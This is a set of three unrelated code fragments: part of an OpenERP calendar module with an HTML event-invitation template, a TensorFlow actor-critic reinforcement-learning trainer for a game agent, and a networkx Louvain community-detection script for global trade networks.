            real_id = parts[0]
            if not with_date:
                return int(real_id)
            real_date = time.strftime("%Y-%m-%d %H:%M:%S",
                                      time.strptime(parts[1], "%Y%m%d%H%M%S"))
            start = datetime.strptime(real_date, "%Y-%m-%d %H:%M:%S")
            end = start + timedelta(hours=with_date)
            return (int(real_id), real_date, end.strftime("%Y-%m-%d %H:%M:%S"))
    return base_calendar_id and int(base_calendar_id) or base_calendar_id
def get_real_ids(ids):
    """Map one virtual/recurring event id, or a list of them, to the
    corresponding real integer id(s)."""
    if isinstance(ids, (str, int, long)):
        return base_calendar_id2real_id(ids)
    if isinstance(ids, (list, tuple)):
        return [base_calendar_id2real_id(calendar_id) for calendar_id in ids]
def real_id2base_calendar_id(real_id, recurrent_date):
    """
    Convert a real event id (type int) into a "virtual/recurring event id" (type string).
    E.g. real event id is 1 and recurrent_date is set to 01-12-2009 10:00:00, so
    it will return 1-20091201100000.
    @param real_id: real event id
    @param recurrent_date: real event recurrent date ("%Y-%m-%d %H:%M:%S")
    @return: string combining the real id and the recurrent date, or the
             unchanged real_id when either argument is falsy
    """
    if not (real_id and recurrent_date):
        return real_id
    stamp = time.strftime("%Y%m%d%H%M%S",
                          time.strptime(recurrent_date, "%Y-%m-%d %H:%M:%S"))
    return '%d-%s' % (real_id, stamp)
def _links_get(self, cr, uid, context=None):
    """
    Get request link.
    @param cr: the current row, from the database cursor
    @param uid: the current user's ID for security checks
    @param context: a standard dictionary for contextual values
    @return: list of (object, name) tuples suitable for a selection field
    """
    # Build the selection list for reference fields from res.request.link.
    obj = self.pool.get('res.request.link')
    ids = obj.search(cr, uid, [])
    res = obj.read(cr, uid, ids, ['object', 'name'], context=context)
    return [(r['object'], r['name']) for r in res]
html_invitation = """
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<title>%(name)s</title>
</head>
<body>
<table border="0" cellspacing="10" cellpadding="0" width="100%%"
style="font-family: Arial, Sans-serif; font-size: 14">
<tr>
<td width="100%%">Hello,</td>
</tr>
<tr>
<td width="100%%">You are invited for <i>%(company)s</i> Event.</td>
</tr>
<tr>
<td width="100%%">Below are the details of event. Hours and dates expressed in %(timezone)s time.</td>
</tr>
</table>
<table cellspacing="0" cellpadding="5" border="0" summary=""
style="width: 90%%; font-family: Arial, Sans-serif; border: 1px Solid #ccc; background-color: #f6f6f6">
<tr valign="center" align="center">
<td bgcolor="DFDFDF">
<h3>%(name)s</h3>
</td>
</tr>
<tr>
<td>
<table cellpadding="8" cellspacing="0" border="0"
style="font-size: 14" summary="Eventdetails" bgcolor="f6f6f6"
width="90%%">
<tr>
<td width="21%%">
<div><b>Start Date</b></div>
</td>
<td><b>:</b></td>
<td>%(start_date)s</td>
<td width="15%%">
<div><b>End Date</b></div>
</td>
<td><b>:</b></td>
<td width="25%%">%(end_date)s</td>
</tr>
<tr valign="top">
<td><b>Description</b></td>
<td><b>:</b></td>
<td colspan="3">%(description)s</td>
</tr>
<tr valign="top">
<td>
<div><b>Location</b></div>
</td>
<td><b>:</b></td>
<td colspan="3">%(location)s</td>
</tr>
<tr valign="top">
<td>
<div><b>Event Attendees</b></div>
</td>
<td><b>:</b></td>
<td colspan="3">
<div>
<div>%(attendees)s</div>
</div>
</td>
</tr>
</table>
</td>
</tr>
</table>
<table border="0" cellspacing="10" cellpadding="0" width="100%%"
style="font-family: Arial, Sans-serif; font-size: 14">
<tr>
<td width="100%%">From:</td>
</tr>
<tr>
<td width="100%%">%(user)s</td>
</tr>
<tr valign="top">
<td width="100%%">-<font color="a7a7a7">-------------------------</font></td>
</tr>
<tr>
<td width="100%%"> <font color="a7a7a7">%(sign)s</font></td>
</tr>
</table>
</body>
</html>
"""
class calendar_attendee(osv.osv):
    """
    Calendar Attendee Information
    """
    _name = 'calendar.attendee'
    _description = 'Attendee information'
    # Records are displayed by their invite type.
    _rec_name = 'cutype'
    __attribute__ = {}
def _get_address(self, name=None, email=None):
    """
    Gives email information in ical CAL-ADDRESS type format.
    @param name: name for CAL-ADDRESS value
    @param email: email address for CAL-ADDRESS value
    """
    display = name or ''
    if name and email:
        display += ':'
    mailto = ('MAILTO:' + email) if email else ''
    return display + mailto
def _compute_data(self, cr, uid, ids, name, arg, context=None):
    """
    Compute data on function fields for attendee values.
    @param cr: the current row, from the database cursor
    @param uid: the current user's ID for security checks
    @param ids: list of calendar attendee's IDs
    @param name: list of field names; only the first one is computed
    @param context: a standard dictionary for contextual values
    @return: dictionary of form {id: {'field name': value}}
    """
    # Only the first requested function field is computed per call.
    name = name[0]
    result = {}
    for attdata in self.browse(cr, uid, ids, context=context):
        id = attdata.id
        result[id] = {}
        if name == 'sent_by':
            # ical SENT-BY address derived from the delegating user.
            if not attdata.sent_by_uid:
                result[id][name] = ''
                continue
            else:
                result[id][name] = self._get_address(attdata.sent_by_uid.name, \
                                        attdata.sent_by_uid.email)
        if name == 'cn':
            # Common name: prefer linked user, then partner, then raw email.
            if attdata.user_id:
                result[id][name] = attdata.user_id.name
            elif attdata.partner_id:
                result[id][name] = attdata.partner_id.name or False
            else:
                result[id][name] = attdata.email or ''
        if name == 'delegated_to':
            # MAILTO list of the attendees this one delegated to.
            todata = []
            for child in attdata.child_ids:
                if child.email:
                    todata.append('MAILTO:' + child.email)
            result[id][name] = ', '.join(todata)
        if name == 'delegated_from':
            # MAILTO list of the attendees that delegated to this one.
            fromdata = []
            for parent in attdata.parent_ids:
                if parent.email:
                    fromdata.append('MAILTO:' + parent.email)
            result[id][name] = ', '.join(fromdata)
        if name == 'event_date':
            # Start date of the referenced event, if any.
            if attdata.ref:
                result[id][name] = attdata.ref.date
            else:
                result[id][name] = False
        if name == 'event_end_date':
            if attdata.ref:
                result[id][name] = attdata.ref.date_deadline
            else:
                result[id][name] = False
        if name == 'sent_by_uid':
            # Falls back to the calling user when no event is referenced.
            if attdata.ref:
                result[id][name] = (attdata.ref.user_id.id, attdata.ref.user_id.name)
            else:
                result[id][name] = uid
        if name == 'language':
            # ical uses hyphenated language tags (e.g. en-US), not en_US.
            user_obj = self.pool.get('res.users')
            lang = user_obj.read(cr, uid, uid, ['lang'], context=context)['lang']
            result[id][name] = lang.replace('_', '-') if lang else False
    return result
def _links_get(self, cr, uid, context=None):
    """
    Get request link for ref field in calendar attendee.
    @param cr: the current row, from the database cursor
    @param uid: the current user's id for security checks
    @param context: A standard dictionary for contextual values
    @return: list of (object, name) tuples suitable for a selection field
    """
    # Same lookup as the module-level _links_get() above; kept as a
    # method so it can be referenced from this model's field definitions.
    obj = self.pool.get('res.request.link')
    ids = obj.search(cr, uid, [])
    res = obj.read(cr, uid, ids, ['object', 'name'], context=context)
    return [(r['object'], r['name']) for r in res]
def _lang_get(self, cr, uid, context=None):
    """
    Get language for language selection field.
    @param cr: the current row, from the database cursor
    @param uid: the current user's id for security checks
    @param context: a standard dictionary for contextual values
    @return: list of (code, name) tuples, codes hyphenated and lower-cased
    """
    lang_obj = self.pool.get('res.lang')
    lang_ids = lang_obj.search(cr, uid, [])
    records = lang_obj.read(cr, uid, lang_ids, ['code', 'name'], context=context)
    # ical expects hyphenated lower-case language tags (en-us, not en_US).
    return [(rec['code'].replace('_', '-').lower(), rec['name']) for rec in records]
_columns = {
'cutype': fields.selection([('individual', 'Individual'), \
('group', 'Group'), ('resource', 'Resource'), \
('room', 'Room'), ('unknown', 'Unknown') ], \
'Invite Type', help="Specify the type of Invitation"),
'member': fields.char('Member', size=124,
help="Indicate the groups that the attendee belongs to"),
'role': fields.selection([('req-participant', 'Participation required'), \
('chair', 'Chair Person'), \
('opt-participant', 'Optional Participation'), \
('non-participant', 'For information Purpose')], 'Role', \
help='Participation role for the calendar user'),
'state': fields.selection([('needs-action', 'Needs Action'),
('tentative', 'Uncertain'),
('declined', 'Declined'),
('accepted', 'Accepted'),
('delegated', 'Delegated')], 'Status', readonly=True, \
help="Status of the attendee's participation"),
'rsvp': fields.boolean('Required Reply?',
help="Indicats whether the favor of a reply is requested"),
'delegated_to': fields.function(_compute_data, \
string='Delegated To', type="char", size=124, store=True, \
multi='delegated_to', help="The users that the original \
request was delegated to"),
'delegated_from': fields.function(_compute_data, string=\
'Delegated From', type="char", store=True, size=124, multi='delegated_from'),
'parent_ids': fields.many2many('calendar.attendee', 'calendar_attendee_parent_rel', \
'attendee_id', 'parent_id', 'Delegrated From'),
'child_ids': fields.many2many('calendar.attendee', 'calendar_attendee_child_rel', \
'attendee_id', 'child_id', 'Delegrated To'),
'sent_by': fields.function(_compute_data, string='Sent By', \
type="char", multi='sent_by', store=True, size=124, \
| |
<filename>training/RL.py
import tensorflow as tf
from tensorflow.keras.layers import Dense, LSTM
from tensorflow.keras.backend import set_value
import numpy as np
from tensorflow.keras.activations import relu, softmax
from copy import deepcopy
from config.loader import Default
from game.state import PlayerState
class Distribution(object):
    """
    Abstract base class for action distributions.

    Concrete subclasses (e.g. ``Categorical``) implement the divergence,
    likelihood and entropy computations; this base only stores the
    dimensionality and a small numerical-stability constant.
    """

    def __init__(self, dim):
        # dim: dimensionality of the distribution (e.g. number of discrete actions).
        self._dim = dim
        # Additive epsilon guarding log(0) and division by zero downstream.
        self._tiny = 1e-8

    @property
    def dim(self):
        # BUG FIX: the original body was `raise self._dim`, which raised a
        # TypeError on every access (only exceptions can be raised); the
        # property is clearly meant to return the stored dimension.
        return self._dim

    def kl(self, old_dist, new_dist):
        """
        Compute the KL divergence of two distributions
        """
        raise NotImplementedError

    def likelihood_ratio(self, x, old_dist, new_dist):
        raise NotImplementedError

    def entropy(self, dist):
        raise NotImplementedError

    def log_likelihood_sym(self, x, dist):
        raise NotImplementedError

    def log_likelihood(self, xs, dist):
        raise NotImplementedError
class Categorical(Distribution):
    """Categorical (discrete) distribution helpers built on TensorFlow ops."""

    def kl(self, old_prob, new_prob):
        """
        KL divergence of two categorical distributions:
        sum(p_1 * (log p_1 - log p_2)).
        """
        log_ratio = tf.math.log(old_prob + self._tiny) - tf.math.log(new_prob + self._tiny)
        return tf.reduce_sum(old_prob * log_ratio)

    def likelihood_ratio(self, x, old_prob, new_prob):
        # Ratio of likelihoods of the one-hot sample x under the two
        # distributions, stabilized against zero probabilities.
        new_lik = tf.reduce_sum(new_prob * x) + self._tiny
        old_lik = tf.reduce_sum(old_prob * x) + self._tiny
        return new_lik / old_lik

    def log_likelihood(self, x, param):
        """
        Compute log likelihood as:
            \log \sum(p_i * x_i)

        :param x (tf.Tensor or np.ndarray): Values to compute log likelihood
        :param param (Dict): Dictionary that contains probabilities of outputs
        :return (tf.Tensor): Log probabilities
        """
        probs = param["prob"]
        assert probs.shape == x.shape, \
            "Different shape inputted. You might have forgotten to convert `x` to one-hot vector."
        return tf.math.log(tf.reduce_sum(probs * x, axis=1) + self._tiny)

    def sample(self, probs, amount=1):
        # NOTE: `tf.random.categorical` expects *log* probabilities.
        # For more details, see https://www.tensorflow.org/versions/r2.0/api_docs/python/tf/random/categorical
        draw_one = lambda p: tf.cast(tf.random.categorical(tf.math.log(p), amount), tf.float32)
        return tf.cast(tf.map_fn(draw_one, probs), tf.int64)

    def entropy(self, probs):
        # Shannon entropy per row: -sum(p * log p).
        return -tf.reduce_sum(probs * tf.math.log(probs + self._tiny), axis=1)
class CategoricalActor(tf.keras.Model):
    '''
    Feed-forward actor producing an epsilon-smoothed categorical policy
    over discrete actions.
    '''

    def __init__(self, action_dim, epsilon, layer_dims, default_activation='elu',
                 name="CategoricalActor"):
        super().__init__(name=name)
        self.dist = Categorical(dim=action_dim)
        self.action_dim = action_dim
        # epsilon: weight of the uniform mixture folded into the softmax output.
        self.epsilon = epsilon
        self.denses = []
        for i, width in enumerate(layer_dims):
            self.denses.append(Dense(width, activation=default_activation,
                                     dtype="float32", name='dense_%d' % i))
        self.prob = Dense(action_dim, dtype='float32', name="prob", activation="softmax")

    def _compute_feature(self, features):
        # Run the dense trunk over the input features.
        out = features
        for hidden in self.denses:
            out = hidden(out)
        return out

    def _compute_dist(self, states):
        """
        Compute categorical distribution

        :param states (np.ndarray or tf.Tensor): Inputs to neural network.
            NN outputs probabilities of K classes
        :return: Categorical distribution
        """
        latent = self._compute_feature(states)
        # Mix the softmax with a uniform floor so no action probability is 0.
        uniform_part = self.epsilon / np.float32(self.action_dim)
        return self.prob(latent) * (1.0 - self.epsilon) + uniform_part

    def get_action(self, state):
        # Sample one action; a single (1-D) state is reshaped to [1, 1, dim]
        # and the results are unwrapped back to scalars for the caller.
        assert isinstance(state, np.ndarray)
        is_single_state = len(state.shape) == 1
        if is_single_state:
            state = state[np.newaxis][np.newaxis].astype(np.float32)
        action, probs = self._get_action_body(tf.constant(state))
        if is_single_state:
            return action.numpy()[0][0], probs.numpy()
        return action, probs

    @tf.function
    def _get_action_body(self, state):
        probs = self._compute_dist(state)
        return tf.squeeze(self.dist.sample(probs), axis=1), probs

    def get_probs(self, states):
        return self._compute_dist(states)

    def compute_entropy(self, states):
        return self.dist.entropy(self._compute_dist(states))
class Policy(tf.keras.Model, Default):
    '''
    Inference-side categorical policy with an optional stateful LSTM.

    Unlike CategoricalActor, this model owns its recurrent layer and hands
    the LSTM hidden state back to the caller so it can be stored alongside
    the transitions and replayed by the learner.
    '''
    def __init__(self, action_dim, layer_dims, lstm_dim, default_activation='elu',
                 name="CategoricalActor"):
        # action_dim: number of discrete actions.
        # layer_dims: widths of the dense layers applied after the LSTM.
        # lstm_dim: LSTM units; 0 disables the recurrent layer entirely.
        super().__init__(name=name)
        Default.__init__(self)
        self.dist = Categorical(dim=action_dim)
        self.action_dim = action_dim
        self.has_lstm = lstm_dim > 0
        if lstm_dim > 0:
            # stateful=True: the LSTM keeps its hidden state across calls,
            # which is what enables step-by-step acting.
            self.lstm = LSTM(lstm_dim, time_major=False, dtype='float32', stateful=True, return_sequences=True,
                             return_state=True, name='lstm')
        else:
            self.lstm = None
        self.denses = [Dense(dim, activation=default_activation, dtype="float32", name='dense_%d' % i)
                       for i, dim in enumerate(layer_dims)]
        self.prob = Dense(action_dim, dtype='float32', name="prob", activation="softmax")

    @tf.function
    def init_body(self, features):
        # Run one full forward pass purely to build the layers' weights;
        # returns the LSTM state (h, c), or (None, None) without an LSTM.
        if self.has_lstm:
            features, hidden_h, hidden_c = self.lstm(features)
            for layer in self.denses:
                features = layer(features)
            features = self.prob(features)
            return hidden_h, hidden_c
        else:
            for layer in self.denses:
                features = layer(features)
            features = self.prob(features)
            return None, None

    def _compute_feature(self, features):
        # Shared trunk: optional LSTM followed by the dense stack.
        # Returns (features, (hidden_h, hidden_c)); the state pair is
        # (None, None) when there is no LSTM.
        if self.has_lstm:
            features, hidden_h, hidden_c = self.lstm(features)
            for layer in self.denses:
                features = layer(features)
            return features, (hidden_h, hidden_c)
        else:
            for layer in self.denses:
                features = layer(features)
            return features, (None, None)

    def _compute_dist(self, states):
        """
        Compute categorical distribution

        :param states (np.ndarray or tf.Tensor): Inputs to neural network.
            NN outputs probabilities of K classes
        :return: (probs, (hidden_h, hidden_c)) -- epsilon-smoothed action
            probabilities plus the LSTM hidden state
        """
        features, hidden_states = self._compute_feature(states)
        # Mix the softmax output with a uniform floor so every action keeps
        # non-zero probability.
        # NOTE(review): EPSILON_GREEDY is presumably supplied by Default
        # (contrast AC.__init__, which uses lowercase epsilon_greedy) -- confirm.
        probs = self.prob(features) * (1.0 - self.EPSILON_GREEDY) + self.EPSILON_GREEDY / np.float32(self.action_dim)
        return probs, hidden_states

    @tf.function
    def _get_action_body(self, state):
        probs, hidden_states = self._compute_dist(state)
        action = tf.squeeze(self.dist.sample(probs), axis=1)
        return action, probs, hidden_states

    def __call__(self, state):
        # Act on a single unbatched observation: [dim] -> [1, 1, dim].
        # NOTE(review): with lstm_dim == 0, hidden_h/hidden_c are None and the
        # .numpy() calls below would fail -- presumably this class is only
        # instantiated with an LSTM; confirm.
        action, probs, (hidden_h, hidden_c) = self._get_action_body(state[np.newaxis][np.newaxis])
        return action.numpy()[0][0], probs.numpy(), hidden_h.numpy()[0], hidden_c.numpy()[0]

    def set_params(self, params):
        # Load weights exported by get_params (e.g. shipped from the learner).
        for dense, param in zip(self.denses, params['actor_core']):
            dense.set_weights(param)
        self.prob.set_weights(params['actor_head'])
        if self.has_lstm:
            self.lstm.set_weights(params['lstm'])

    def get_params(self):
        # Export weights in the dict layout expected by set_params.
        actor_weights = [dense.get_weights() for dense in self.denses]
        return {
            'lstm' : self.lstm.get_weights() if self.has_lstm else None,
            'actor_core': actor_weights,
            'actor_head': self.prob.get_weights(),
        }
class ActionStateProbs(tf.keras.Model):
    '''
    Unconditional model representing probability distribution for each action state.
    '''

    def __init__(self, name='action_state_probs'):
        super().__init__(name=name)
        # One trainable logit per action state, initialized uniformly.
        initial = tf.fill([1, PlayerState.action_state_dim], 1.)
        self.probs = tf.Variable(initial, dtype=tf.float32)

    def get(self):
        # Normalize the raw logits into a probability distribution.
        return softmax(self.probs)
class V(tf.keras.Model):
    """
    State-value function approximator (critic head).
    """

    def __init__(self, layer_dims, default_activation='elu', name='vf'):
        super().__init__(name=name)
        self.denses = []
        for width in layer_dims:
            self.denses.append(Dense(width, activation=default_activation, dtype='float32'))
        # Final linear layer producing a single scalar value per input.
        self.v = Dense(1, activation='linear', dtype='float32', name="v")

    def call(self, states):
        hidden = states
        for layer in self.denses:
            hidden = layer(hidden)
        return self.v(hidden)
class AC(tf.keras.Model, Default):
def __init__(self, action_dim, layer_dims,
             lstm_dim):
    # Combined actor-critic container used on the learner side.
    #
    # action_dim: number of discrete actions for the policy head.
    # layer_dims: layer_dims[0] is the width of the shared dense body;
    #             layer_dims[1:] are the widths used by both the value head
    #             and the actor head.
    # lstm_dim:   LSTM units for the shared recurrent layer; 0 disables it.
    super(AC, self).__init__(name='AC')
    Default.__init__(self)
    self.action_dim = action_dim
    self.has_lstm = lstm_dim > 0
    if lstm_dim == 0:
        self.lstm = None
    else:
        # Not stateful here: training consumes whole trajectories and the
        # initial state is passed explicitly in _train.
        self.lstm = LSTM(lstm_dim, time_major=False, dtype='float32', stateful=False, return_sequences=True,
                         return_state=False, name='lstm')
    self.dense_body = Dense(layer_dims[0], activation='elu', dtype='float32')
    self.V = V(layer_dims[1:])
    # NOTE(review): `self.epsilon_greedy` is presumably provided by Default;
    # the inference-side Policy class uses `self.EPSILON_GREEDY` -- confirm
    # both attribute names exist (or that this one is intended).
    self.policy = CategoricalActor(action_dim, self.epsilon_greedy, layer_dims[1:])
    self.as_probs = ActionStateProbs()
    # Plain SGD (lr=1) for the standalone action-state distribution model.
    self.p_optim = tf.keras.optimizers.SGD(learning_rate=1.)
    #self.optim = tf.keras.optimizers.RMSprop(rho=0.99, epsilon=1e-5) # Learning rate is affected when training
    self.optim = tf.keras.optimizers.Adam(beta_1=0.9, beta_2=0.98, epsilon=1e-8, clipvalue=4e-3)
    self.step = tf.Variable(0, dtype=tf.int32)
    # Precomputed index grids of shape (BATCH_SIZE, TRAJECTORY_LENGTH-1, 1);
    # concatenated with the action indices in _train to gather
    # per-(batch, step, action) entries via tf.gather_nd.
    self.range_ = tf.expand_dims(tf.tile(tf.expand_dims(tf.range(self.TRAJECTORY_LENGTH-1, dtype=tf.int32), axis=0), [self.BATCH_SIZE, 1]),
                                 axis=2)
    self.pattern = tf.expand_dims([tf.fill((self.TRAJECTORY_LENGTH-1,), i) for i in range(self.BATCH_SIZE)], axis=2)
def train(self, log_name, training_params, as_entropy_scale, states, actions, rewards, probs, hidden_states, gpu):
    """
    Run one update step on a batch of trajectories and write TensorBoard
    summaries under `log_name`.

    :param training_params: dict with 'learning_rate', 'entropy_cost', 'gamma'.
    :param as_entropy_scale: scale of the action-state rarity reward bonus.
    :param probs: behaviour-policy probabilities recorded at acting time.
    :param hidden_states: initial LSTM state per trajectory.
    :param gpu: device index forwarded to _train (negative means CPU).
    :return: mean policy entropy over the batch.
    """
    # do some stuff with arrays
    # print(states, actions, rewards, dones)
    # Set both networks with corresponding initial recurrent state
    self.optim.learning_rate.assign(training_params['learning_rate'])
    # NOTE(review): _train's 4th return value is actually p_loss (see its
    # return statement; the max_entropy it computes is unused), so the local
    # `max_entropy` -- and the "/max_entropy" summary below -- hold the policy
    # loss. Confirm which metric is intended.
    v_loss, mean_entropy, min_entropy, max_entropy, min_logp, max_logp, grad_norm, as_entropy \
        = self._train(tf.cast(training_params['entropy_cost'], tf.float32), tf.cast(training_params['gamma'], tf.float32),
                      tf.cast(as_entropy_scale, tf.float32), states, actions, rewards, probs, hidden_states, gpu)

    print(v_loss, max_entropy, mean_entropy, grad_norm)

    tf.summary.scalar(name=log_name + "/v_loss", data=v_loss)
    tf.summary.scalar(name=log_name + "/as_ent", data=as_entropy)
    tf.summary.scalar(name=log_name + "/min_entropy", data=min_entropy)
    tf.summary.scalar(name=log_name + "/max_entropy", data=max_entropy)
    tf.summary.scalar(name=log_name + "/mean_entropy", data=mean_entropy)
    tf.summary.scalar(name=log_name + "/ent_scale", data=training_params['entropy_cost'])
    tf.summary.scalar(name=log_name + "/gamma", data=training_params['gamma'])
    tf.summary.scalar(name=log_name + "/learning_rate", data=training_params['learning_rate'])
    tf.summary.scalar(name=log_name + "/min_logp", data=min_logp)
    tf.summary.scalar(name=log_name + "/max_logp", data=max_logp)
    tf.summary.scalar(name=log_name + "/grad_norm", data=grad_norm)
    #tf.summary.scalar(name="misc/distance", data=tf.reduce_mean(states[:, :, -1]))
    tf.summary.scalar(name=log_name + "/reward", data=tf.reduce_sum(tf.reduce_mean(rewards, axis=0)))
    return mean_entropy
@tf.function
def _train(self, alpha, gamma, as_entropy_scale, states, actions, rewards, probs, hidden_states, gpu):
    '''
    Main training function

    Two gradient-tape passes:
      1. fit the unconditional action-state distribution (self.as_probs)
         by negative log likelihood, and use the resulting rarity bonus to
         shape `rewards`;
      2. trace-target actor-critic update of the shared LSTM/body, the
         critic V and the policy head.

    :param alpha: entropy-bonus coefficient for the policy loss.
    :param gamma: discount factor.
    :param as_entropy_scale: scale of the action-state rarity reward bonus.
    :param probs: behaviour-policy probabilities for the importance ratio.
    :param hidden_states: initial LSTM state per trajectory (NaN = no state).
    :param gpu: device index; negative runs on CPU.
    '''
    with tf.device("/gpu:{}".format(gpu) if gpu >= 0 else "/cpu:0"):
        actions = tf.cast(actions, dtype=tf.int32)
        with tf.GradientTape() as tape:
            # Update the action_state probability distribution
            as_probs = self.as_probs.get()[0]
            # Recover each step's action-state id from its one-hot slice of
            # the state vector (last timestep excluded).
            action_states = tf.cast(tf.argmax(states[:, :-1,
                                              PlayerState.onehot_offsets['action_state']:
                                              PlayerState.onehot_offsets['action_state'] + PlayerState.action_state_dim], axis=2), dtype=tf.int32)
            taken_as = tf.gather_nd(as_probs, tf.expand_dims(action_states, axis=2), batch_dims=0)
            # Negative log likelihood of the observed action states.
            NLL = -tf.math.log(taken_as + 1e-8)
            loss = tf.reduce_mean(NLL)
        grad = tape.gradient(loss, self.as_probs.trainable_variables)
        self.p_optim.apply_gradients(zip(grad, self.as_probs.trainable_variables))

        # Reward rare action_states with their negative log likelihood
        # (thresholded at log(400) and capped at 10).
        rewards += tf.clip_by_value(NLL - tf.math.log(400.0), clip_value_min=0.0,
                                    clip_value_max=10.0) * as_entropy_scale
        # Entropy of the fitted action-state distribution (for logging).
        as_ent = tf.reduce_mean(tf.reduce_sum(tf.multiply(-tf.math.log(as_probs+1e-8), as_probs), -1))

        with tf.GradientTape() as tape:
            # Optimize the actor and critic
            # NaNs in the stored hidden state mean "no state yet" -> zeros.
            hidden = tf.where(tf.math.is_nan(hidden_states), tf.zeros_like(hidden_states), hidden_states)
            if self.has_lstm:
                lstm_states = self.lstm(states, initial_state=[hidden[:,0],hidden[:, 1]])
            else:
                lstm_states = states
            lstm_states = self.dense_body(lstm_states)
            v_all = self.V(lstm_states)[: ,:, 0]
            p = self.policy.get_probs(lstm_states[:, :-1])
            # Elementwise ratio current-policy / behaviour-policy probabilities.
            kl = tf.divide(p, probs+1e-3)#tf.reduce_sum(p * tf.math.log(tf.divide(p, probs)), axis=-1)
            # (batch, step, action) index triples for gather_nd below.
            indices = tf.concat(values=[self.pattern, self.range_, tf.expand_dims(actions, axis=2)], axis=2)
            # Truncated importance weight for the taken action, clipped at 1.
            rho_mu = tf.minimum(1., tf.gather_nd(kl, indices, batch_dims=0))
            targets = self.compute_trace_targets(v_all, rewards, rho_mu, gamma)
            #targets = self.compute_gae(v_all[:, :-1], rewards[:, :-1], v_all[:, -1])
            advantage = tf.stop_gradient(targets) - v_all
            v_loss = tf.reduce_mean(tf.square(advantage))
            p_log = tf.math.log(p + 1e-8)
            ent = - tf.reduce_sum(tf.multiply(p_log, p), -1)
            taken_p_log = tf.gather_nd(p_log, indices, batch_dims=0)
            # Policy gradient with one-step bootstrapped advantage
            # (gamma * target_{t+1} + r_t - V_t) and entropy bonus alpha * ent.
            p_loss = - tf.reduce_mean( tf.stop_gradient(rho_mu) * taken_p_log * tf.stop_gradient(targets[:, 1:]*gamma + rewards - v_all[:, :-1]) + alpha * ent)
            #taken_p_log * tf.stop_gradient(advantage) + self.entropy_scale * ent)
            total_loss = 0.5 * v_loss + p_loss

        # NOTE(review): when lstm_dim == 0, self.lstm is None (see __init__)
        # and accessing .trainable_variables here would fail -- presumably
        # this path is always used with an LSTM; confirm.
        grad = tape.gradient(total_loss, self.policy.trainable_variables + self.dense_body.trainable_variables
                             + self.V.trainable_variables
                             + self.lstm.trainable_variables)
        # x is used to track the gradient size
        x = 0.0
        c = 0.0
        for gg in grad:
            c += 1.0
            x += tf.reduce_mean(tf.abs(gg))
        x /= c
        self.optim.apply_gradients(zip(grad, self.policy.trainable_variables + self.dense_body.trainable_variables
                                       + self.V.trainable_variables + self.lstm.trainable_variables))
        self.step.assign_add(1)

        mean_entropy = tf.reduce_mean(ent)
        min_entropy = tf.reduce_min(ent)
        max_entropy = tf.reduce_max(ent)
        # NOTE(review): the 4th value returned is p_loss, while the caller
        # (train) unpacks that slot as `max_entropy`; the max_entropy computed
        # just above is never returned -- confirm which is intended.
        return v_loss, mean_entropy, min_entropy, p_loss, tf.reduce_min(
            p_log), tf.reduce_max(p_log), x, as_ent
def compute_gae(self, v, rewards, last_v, gamma):
    """
    Compute lambda-returns (GAE-style) by scanning the trajectory backwards:
    R_t = (1 - lambda) * V_t + lambda * (r_t + gamma * R_{t+1}),
    bootstrapped from last_v.
    """
    # tf.scan runs over the leading axis, so put time first.
    v_tm = tf.transpose(v)
    r_tm = tf.transpose(rewards)
    reversed_sequence = [tf.reverse(tensor, [0]) for tensor in [v_tm, r_tm]]

    def bellman(future, present):
        val, rew = present
        return (1. - self.gae_lambda) * val + self.gae_lambda * (
            rew + gamma * future)

    lam_returns = tf.scan(bellman, reversed_sequence, last_v)
    # Undo the reversal and restore (batch, time) layout.
    lam_returns = tf.reverse(lam_returns, [0])
    return tf.transpose(lam_returns)
def compute_trace_targets(self, v, | |
<gh_stars>1-10
# This script will use community detection algorithms from networkx.community module
# (and maybe other modules too) to find communities in the Global Trade Network data.
#
# (0). Import packages and libraries
import numpy as np
import networkx as nx
import community as c # python-louvain module
import sklearn.cluster as skc
import sklearn.metrics as skm
import matplotlib.pyplot as plt
import utils.data_manipulation as dm
import utils.network_manipulation as nm
import utils.plot_functions as pf
# import matplotlib.cm as cm
# import pandas as pd
# from mpl_toolkits.mplot3d import Axes3D
# import time
# import os
# import csv
# import sys
# import scipy as sp # library to deal with sparse graphs for Cuthill-Mckee and Laplacian
#------------------------------------------------------------------------------------------------------------
# Load in a network for a specific year
dirPre = dm.set_dir_tree()  # root directory of the data tree
year = np.array(1962)       # trade-network year to load (0-d numpy array -- presumably the loader expects this; confirm)
flg_sym = True              # build the symmetrized (undirected) version of the network
G = nm.construct_ntwrkX_Graph(dirPre=dirPre, year=year, flg_sym=flg_sym)
#------------------------------------------------------------------------------------------------------------
# Explore 'community' module
# Compute best partition and dendrogram using Louvain algorithm in 'community' module
# Sweep over Louvain resolution values, recording partition modularity at
# several dendrogram levels for each resolution.
res = [0.1, 0.5, 1, 3, 5, 7, 10]  # different resolution values for partitioning algorithms
q_bp = np.zeros_like(res)         # modularity of c.best_partition, per resolution
q_dend = np.zeros((3, len(res)))  # modularity at dendrogram level 0, level 1 (induced), level 1 (flattened)
coverage = np.zeros_like(res)     # NOTE(review): never assigned below (the coverage code is commented out), so it stays all zeros

for i, r in enumerate(res):
    print('Resolution is ', r)
    #
    # (1). compute partitions
    part = c.best_partition(G, partition=None, weight='weight', resolution=r, randomize=False)
    dend = c.generate_dendrogram(G, part_init=None, weight='weight', resolution=r, randomize=False)
    print('Tree depth is ', len(dend))
    #
    # (2). compute partition quality metrics
    # (a). 'modularity'
    q_bp[i] = c.modularity(part, G, weight='weight')
    q_dend[0, i] = c.modularity(dend[0], G, weight='weight')
    #
    # # (b). 'coverage' - (note: have to turn partition into a list of sets.)
    # # ???? NOT WORKING AND NOT SURE WHY.
    # partsList = []
    # numParts = part.get( max(part,key=part.get) )
    # for p in range( numParts ):
    #     partsList.append( set([i for i,j in part.items() if j == p]) )
    # coverage[i] = nx.community.coverage(G, partsList)
    #
    # Looking further into dendrogram. Makes sense.
    try:
        G2 = c.induced_graph(dend[0], G, weight='weight')  # graph whose nodes are the level-0 clusters
        q_dend[1, i] = c.modularity(dend[1], G2, weight='weight')
        pp = c.partition_at_level(dend, 1)  # express partition at a given layer in terms of all nodes
        q_dend[2, i] = c.modularity(pp, G, weight='weight')
    except Exception:
        # The dendrogram can be a single level deep, in which case dend[1]
        # does not exist; skip the deeper-level metrics for this resolution.
        # (Was a bare `except:`, which also swallowed KeyboardInterrupt and
        # SystemExit -- narrowed to Exception to keep the best-effort intent.)
        continue
# Plot modularity metric for different partitions at different resolution parameters.
# (Disabled: flip to True to show the modularity curves.)
if False:
